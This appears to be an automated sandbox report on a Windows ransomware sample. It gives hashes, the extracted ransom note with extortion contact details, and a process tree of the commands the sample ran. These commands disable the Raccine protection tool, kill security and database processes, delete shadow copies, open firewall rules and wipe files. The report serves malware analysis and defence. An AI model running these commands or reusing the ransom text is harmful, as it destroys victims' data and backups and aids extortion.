Analysis

  • max time kernel
    134s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    29-10-2021 15:49

General

  • Target

    c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

  • Size

    203KB

  • MD5

    cefd366a2c000d9bbbd35dfd0a73311d

  • SHA1

    0864171c1e033067b04317979803d97f1c90c85b

  • SHA256

    c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c

  • SHA512

    5f43b27b0495afb6ded495816405efe4a0d77b9991f56b7bfd09cd56d3ae890ec8dc2461a1806b2131edeaafc15d3478b471d1ef0376f9f78128eff539451040

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\HOW_TO_RECOVER_MY_FILES.txt

Ransom Note
ALL YOUR FILES HAS BEEN ENCRYPTED! ALL YOUR FILES HAVE NOW THE .LOCKED EXTENSION! TO DE-CRYPT YOUR FILES, CONTACT US HERE: 1- Download qTox >>> https://tox.chat/download.html 2- Install qTox and make a profile, after you have done this: 3- Use this TOX-ID (Copy + Paste): FF45ED6FCE4433D273E34DA1C22AC1B0290973082BE068066D5EDF6C62EF39500A691BDE33B9 and make a friend request, after 5 minutes, you will be in contact with our negotiator. If you want proof, attach 2-3 encrypted files together with the Key ID (you can find the Key-ID in the How-To-Recover-My-Files document on your Desktop,) less then 5Mb each, non-archived and your files should not contain valuable information, like Databases, back-ups, large excel sheets, etc. You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail! Alternatively, please get in touch with the negotiator at the following email address: [email protected] Key Identifier: lDTO1SAbz9qtw2XFBP12DyqdWP+Tor27gNFwYyAKvoQR/JQjh+ApS27DHMh6Kde5APF+wrIPKG8q08W08qCGtU8SQKUi9YEtgfWsa1YXSWcdLNqpAjYwSY9AI/KtEBHQ7moltUfF4rPSOB3SzqlvAe6ttH0h9bWuJBVTGP+TrW6H04YY7JWWxgaf27+hDYfIhFCI+r4NwqZeSDNPLqM5xTBRLV4pI7p7d8Ie4LqvCg18erTCzG1fWlV5gsbhUo2frbZCPRa5S+uNamY4rMf7eEQUzvcaVi7aBY2igT7yXdsA5oOQFcGA1uX0QpZ75cLH3lQNvIHJBf9MoEw+Xyvn4Ju5LjZPor2dy1KOLYxuEGKdiISkLyml5/Dhh7jVr8zgi0QL8tNBeb+STFoEtbI9CVYw252NsZ4UC3hTkX8JtF2fn7Mb0kWYYaXS/xk0Hsack7Fv28y36YbisdfbKjRh0qmdnCuqFcBUTlrM/3YJ7qHVCrpTUILglqSnrsOxyjJe5jyWHan4M+4l4RNHoCkNAMKBi0MVNiNmWfllXDorPi2Y1fzy/LbryQYcMCiR+ZvD8AHIFsnfWsIZoSl1R4OfDcMuaFjAbHTO1pym6IZHzHEdYEEVD1zVFjdr/Ug5e1gBGXVYq5bMkQ/IS1MF5n9iMJPTHvGc4hg9DOGwUNXH9FY=
URLs

https://tox.chat/download.html

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Downloads PsExec from SysInternals website 1 IoCs

    Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
    "C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Enumerates connected drives
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2732
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:948
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:3960
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:3760
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:516
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
            PID:3240
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config FDResPub start= auto
            2⤵
              PID:2656
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config SQLTELEMETRY start= disabled
              2⤵
                PID:2832
              • C:\Windows\SysWOW64\sc.exe
                "sc.exe" config SSDPSRV start= auto
                2⤵
                  PID:3688
                • C:\Windows\SysWOW64\sc.exe
                  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                  2⤵
                    PID:380
                  • C:\Windows\SysWOW64\sc.exe
                    "sc.exe" config SstpSvc start= disabled
                    2⤵
                      PID:716
                    • C:\Windows\SysWOW64\sc.exe
                      "sc.exe" config upnphost start= auto
                      2⤵
                        PID:3192
                      • C:\Windows\SysWOW64\sc.exe
                        "sc.exe" config SQLWriter start= disabled
                        2⤵
                          PID:652
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mspub.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1192
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM synctime.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2760
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mspub.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2028
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopqos.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3176
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM Ntrtscan.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1984
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4004
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM isqlplussvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3536
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3812
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqbcoreservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3152
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM onenote.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3572
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM firefoxconfig.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3188
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM agntsvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3884
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM tbirdconfig.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3300
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM PccNTMon.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3228
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM encsvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2380
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM thebat.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3500
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM dbeng50.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1016
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM msaccess.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1272
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM steam.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1816
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM thebat64.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2608
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM excel.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3720
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM outlook.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1352
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM CNTAoSMgr.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2524
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ocomm.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2368
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM tmlisten.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2584
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM visio.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3692
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM infopath.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2192
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM msftesql.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1884
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlwriter.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2156
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mbamtray.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:516
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3188
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM powerpnt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2276
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM zoolz.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:508
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM oracle.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3968
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM winword.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2408
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopqos.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2112
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlagent.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2840
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" IM thunderbird.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:1484
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM dbsnmp.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:896
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld-nt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1288
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlbrowser.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2772
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM xfssvccon.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2196
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM wordpad.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3484
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlservr.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1316
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld-opt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1340
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ocautoupds.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3808
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ocssd.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3792
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                          2⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3904
                        • C:\Windows\SysWOW64\netsh.exe
                          "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                          2⤵
                          • Drops file in Windows directory
                          PID:1948
                        • C:\Windows\SysWOW64\netsh.exe
                          "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                          2⤵
                            PID:4052
                          • C:\Windows\SysWOW64\arp.exe
                            "arp" -a
                            2⤵
                              PID:1248
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                              2⤵
                                PID:1532
                              • C:\Windows\SysWOW64\netsh.exe
                                "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                2⤵
                                  PID:3208
                                • C:\Windows\SysWOW64\netsh.exe
                                  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                  2⤵
                                    PID:2388
                                  • C:\Windows\SysWOW64\arp.exe
                                    "arp" -a
                                    2⤵
                                      PID:1936
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES.hta
                                      2⤵
                                      • Blocklisted process makes network request
                                      PID:2476
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                      2⤵
                                        PID:3980
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 127.0.0.7 -n 3
                                          3⤵
                                          • Runs ping.exe
                                          PID:744
                                        • C:\Windows\SysWOW64\fsutil.exe
                                          fsutil file setZeroData offset=0 length=524288 “%s”
                                          3⤵
                                            PID:676
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
                                          2⤵
                                            PID:3032
                                            • C:\Windows\SysWOW64\choice.exe
                                              choice /C Y /N /D Y /T 3
                                              3⤵
                                                PID:968

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES.hta

                                            MD5

                                            5c3b69f2f68e3930d731972b730ddbd6

                                            SHA1

                                            aa3e6d8952c6e3e7e2be5a2e07e916c01d2acbe7

                                            SHA256

                                            0de291c084cbe3b10ac49211e29a849fc8bf84da8f41d077b1edd0442b2db23c

                                            SHA512

                                            5957790620fcedfdf019b3d61715ef35ac8bfd255b35eb63c9da19519e126d25f674948ffa0f03d3462cb5b0cf8ac15e462f77773cd4fe76bbc8b8dce22162fc

                                          • memory/380-128-0x0000000000000000-mapping.dmp

                                          • memory/508-164-0x0000000000000000-mapping.dmp

                                          • memory/516-122-0x0000000000000000-mapping.dmp

                                          • memory/516-161-0x0000000000000000-mapping.dmp

                                          • memory/652-131-0x0000000000000000-mapping.dmp

                                          • memory/716-129-0x0000000000000000-mapping.dmp

                                          • memory/896-170-0x0000000000000000-mapping.dmp

                                          • memory/948-119-0x0000000000000000-mapping.dmp

                                          • memory/1016-148-0x0000000000000000-mapping.dmp

                                          • memory/1192-132-0x0000000000000000-mapping.dmp

                                          • memory/1248-208-0x0000000000000000-mapping.dmp

                                          • memory/1272-149-0x0000000000000000-mapping.dmp

                                          • memory/1288-171-0x0000000000000000-mapping.dmp

                                          • memory/1316-175-0x0000000000000000-mapping.dmp

                                          • memory/1340-176-0x0000000000000000-mapping.dmp

                                          • memory/1352-153-0x0000000000000000-mapping.dmp

                                          • memory/1484-169-0x0000000000000000-mapping.dmp

                                          • memory/1532-209-0x0000000000000000-mapping.dmp

                                          • memory/1816-151-0x0000000000000000-mapping.dmp

                                          • memory/1884-159-0x0000000000000000-mapping.dmp

                                          • memory/1948-183-0x0000000000000000-mapping.dmp

                                          • memory/1984-136-0x0000000000000000-mapping.dmp

                                          • memory/2028-134-0x0000000000000000-mapping.dmp

                                          • memory/2112-167-0x0000000000000000-mapping.dmp

                                          • memory/2156-160-0x0000000000000000-mapping.dmp

                                          • memory/2192-158-0x0000000000000000-mapping.dmp

                                          • memory/2196-173-0x0000000000000000-mapping.dmp

                                          • memory/2276-163-0x0000000000000000-mapping.dmp

                                          • memory/2368-155-0x0000000000000000-mapping.dmp

                                          • memory/2380-146-0x0000000000000000-mapping.dmp

                                          • memory/2408-166-0x0000000000000000-mapping.dmp

                                          • memory/2524-154-0x0000000000000000-mapping.dmp

                                          • memory/2584-156-0x0000000000000000-mapping.dmp

                                          • memory/2608-152-0x0000000000000000-mapping.dmp

                                          • memory/2656-126-0x0000000000000000-mapping.dmp

                                          • memory/2732-115-0x0000000000140000-0x0000000000141000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/2732-210-0x000000000CBC0000-0x000000000CBC1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/2732-211-0x00000000069A0000-0x00000000069A1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/2732-117-0x0000000004920000-0x0000000004921000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/2732-123-0x0000000005190000-0x0000000005191000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/2732-118-0x00000000049A0000-0x00000000049A1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/2760-133-0x0000000000000000-mapping.dmp

                                          • memory/2772-172-0x0000000000000000-mapping.dmp

                                          • memory/2832-125-0x0000000000000000-mapping.dmp

                                          • memory/2840-168-0x0000000000000000-mapping.dmp

                                          • memory/3152-140-0x0000000000000000-mapping.dmp

                                          • memory/3176-135-0x0000000000000000-mapping.dmp

                                          • memory/3188-162-0x0000000000000000-mapping.dmp

                                          • memory/3188-142-0x0000000000000000-mapping.dmp

                                          • memory/3192-130-0x0000000000000000-mapping.dmp

                                          • memory/3228-145-0x0000000000000000-mapping.dmp

                                          • memory/3240-124-0x0000000000000000-mapping.dmp

                                          • memory/3300-144-0x0000000000000000-mapping.dmp

                                          • memory/3484-174-0x0000000000000000-mapping.dmp

                                          • memory/3500-147-0x0000000000000000-mapping.dmp

                                          • memory/3536-138-0x0000000000000000-mapping.dmp

                                          • memory/3572-141-0x0000000000000000-mapping.dmp

                                          • memory/3688-127-0x0000000000000000-mapping.dmp

                                          • memory/3692-157-0x0000000000000000-mapping.dmp

                                          • memory/3720-150-0x0000000000000000-mapping.dmp

                                          • memory/3760-121-0x0000000000000000-mapping.dmp

                                          • memory/3792-178-0x0000000000000000-mapping.dmp

                                          • memory/3808-177-0x0000000000000000-mapping.dmp

                                          • memory/3812-139-0x0000000000000000-mapping.dmp

                                          • memory/3884-143-0x0000000000000000-mapping.dmp

                                          • memory/3904-187-0x0000000000C40000-0x0000000000C41000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-205-0x0000000004383000-0x0000000004384000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-184-0x0000000006DB0000-0x0000000006DB1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-186-0x0000000004382000-0x0000000004383000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-185-0x0000000004380000-0x0000000004381000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-179-0x0000000000000000-mapping.dmp

                                          • memory/3904-190-0x00000000073E0000-0x00000000073E1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-191-0x0000000006970000-0x0000000006971000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-192-0x0000000007E40000-0x0000000007E41000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-193-0x0000000007BD0000-0x0000000007BD1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-194-0x0000000000670000-0x0000000000671000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-204-0x0000000000670000-0x0000000000671000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-206-0x0000000004384000-0x0000000004386000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/3904-182-0x0000000006740000-0x0000000006741000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-180-0x0000000000670000-0x0000000000671000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3904-181-0x0000000000670000-0x0000000000671000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3960-120-0x0000000000000000-mapping.dmp

                                          • memory/3968-165-0x0000000000000000-mapping.dmp

                                          • memory/4004-137-0x0000000000000000-mapping.dmp

                                          • memory/4052-207-0x0000000000000000-mapping.dmp